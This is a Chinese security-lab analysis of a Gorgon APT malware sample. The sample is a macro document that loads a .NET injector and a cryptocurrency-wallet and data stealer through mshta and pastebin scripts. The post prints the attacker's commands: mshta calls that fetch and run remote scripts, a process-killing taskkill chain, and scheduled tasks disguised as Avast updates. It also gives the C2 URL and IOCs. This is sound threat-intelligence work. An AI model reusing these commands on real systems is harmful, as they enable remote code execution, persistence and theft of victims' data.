后起之秀:Gorgon APT黑客组织觊觎虚拟货币钱包

2019-09-18 8,647

背景

Gorgon APT组织是一个被认为来自巴基斯坦的攻击组织,该组织在2018年8月份由Palo Alto Unit42团队进行披露,主要针对全球外贸人士进行攻击。除此之外,安全研究人员还发现Gorgon针对英国、西班牙、俄罗斯、美国等政府目标发起了攻击,算是APT组织的后起之秀,最近一年非常活跃。

近日,深信服安全团队发现了Gorgon APT组织最新变种样本,此样本释放了一个盗取受害者虚拟币钱包的木马。

微信图片_20190917141526.png 

/攻击流程图/


样本分析

1.样本中包含恶意的宏代码,如下所示:

图片1.png 

2.通过动态调试,宏代码调用mshta.exe执行mshta http://bitly.com/6xdfsSXsh6,访问短链接网址http://bitly.com/6xdfsSXsh6,如下所示:

图片2.png 

3.短链接跳转到网站:https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html,网站包含恶意脚本,如下所示:

图片3.png 

4.解密里面的恶意脚本,如下所示:

图片4.png 

5.调用mshta.exe执行mshta.exe  http://www.pastebin.com/raw/UZEbWMK9,访问http://www.pastebin.com/raw/UZEbWMK9网站的内容,如下所示:

图片5.png 

6.解密上面的恶意脚本内容,如下所示:

图片6.png 

7.调用cmd.exe程序,执行如下命令,结束相关进程:

"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit

8.将以下命令,写入自启动注册表项:

mshta.exe http://pastebin.com/raw/hJjQuQv1

9.通过命令,创建两个计划任务启动项Avast Updater和Avast backup,如下所示:

"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 30 /tn "Avast Updater" /tr "mshta.exe http://pastebin.com/raw/BrH6UFRc" /F

"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 300 /tn "Avast backup" /tr "mshta.exe http://pastebin.com/raw/nhcP3XgH" /F

10.上面三个自启动项,分别执行三个不同的脚本,如下所示:

http://pastebin.com/raw/hJjQuQv1

http://pastebin.com/raw/BrH6UFRc

http://pastebin.com/raw/nhcP3XgH

 

hJjQuQv1脚本解密之后,如下所示:

图片7.png 

 

BrH6UFRc脚本解密之后,如下所示:

图片8.png 

再次解密脚本,如下所示:

图片9.png 

11.下载https://pastebin.com/raw/dkrjWec2脚本并执行,脚本内容,如下所示:

图片10.png 

解密脚本之后,如下所示:

图片11.png 

12.解密之后替换里面的字符串,然后加载执行,如下所示:

图片12.png 

13.替换之后,是一个PE文件,如下所示:

图片13.png 

14.通过查看这个PE文件为NET编写的注入程序,如下所示:

图片14.png 

15.将PE程序注入到calc.exe进程中,下载https://pastebin.com/raw/j8mRken0脚本内容,然后替换里面的@!并执行,脚本内容,如下所示:

图片15.png 

16.解密脚本之后也是一个PE文件,如下所示:

图片16.png 

17.把这个解密出来的PE程序通过上面解密出来的PE注入程序,注入到calc.exe进程中,此PE程序,盗取受害者虚拟钱包数据,例如比特币,莱特币等,如下所示:

图片17.png 

18.盗取受害者聊天工具记录,例如:Skype、Telegram等,如下所示:

图片18.png 

19.屏幕截图操作,如下所示:

图片19.png 

20.获取受害者主机相关信息,当前IP地址或区域信息以及磁盘文件名等,如下所示:

图片20.png 

21.盗取受害者浏览器历史记录信息等,如下所示:

图片21.png 

22.远程服务器URL:http://216.170.126.139/Panel/10/index.php,捕获到的数据包流量,如下所示:

图片22.png 

 

23.nhcP3XgH脚本解密之后,如下所示:

图片23.png 

 

安全建议:

不管攻击者的入侵计划是多么的缜密,总会由于技术的限制留下些许蛛丝马迹,譬如软件的植入、网络流量的产生,这些痕迹可能并不足以作为APT攻击的证据,但一旦发现,就必须提高警惕,并及时的保存现场,通知安全相关人员,对疑似感染的主机进行隔离和检查。同时也要注意日常防范措施,在思想上和技术上双管齐下:

1、加强人员安全防范意识。不要打开来历不明的邮件附件,对于邮件附件中的文件要谨慎运行,如发现脚本或其他可执行文件可先使用杀毒软件进行扫描;

2、升级office系列软件到最新版本,不要随意运行不可信文档中的宏;

3、部署分层控制,实现深度网络安全防御,构建端到端的立体安全防护网络。在网络规划时需要充分考虑终端接入安全、内网安全防护、应用系统安全等多个维度,并根据不同的业务需求和安全等级进行合理的分区隔离;

4、重视网络数据、系统运行状态的审计和分析。严格把控系统的访问权限,持续对数据流的进出进行有效的监控,及时更新安全补丁,定时进行安全配置基线的审视和系统安全风险的评估,及时发现可以行为并通过通信线路加密、应用层安全扫描与防护、隔离等有效技术手段将可能的安全风险扼杀在摇篮里。

 

IOCs

MD5:

A137185171B1176FC125A74250928933  

A5DE91F73A5E75AA7E33954FD0ADDA13

E0CE8A86F85C506591BE8897C07FB626

URL:

http://bitly.com/6xdfsSXsh6

https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html

http://www.pastebin.com/raw/UZEbWMK9

http://pastebin.com/raw/hJjQuQv1

http://pastebin.com/raw/BrH6UFRc

http://pastebin.com/raw/nhcP3XgH

http://216.170.126.139/Panel/10/index.php

IP :

216.170.126.139

本文作者:Further_eye

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/112715.html

Tags:
评论  (0)
快来写下你的想法吧!

Further_eye

文章数:319 积分: 2105

深信服科技旗下安全实验室,致力于网络安全攻防技术的研究和积累,深度洞察未知网络安全威胁,解读前沿安全技术。

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号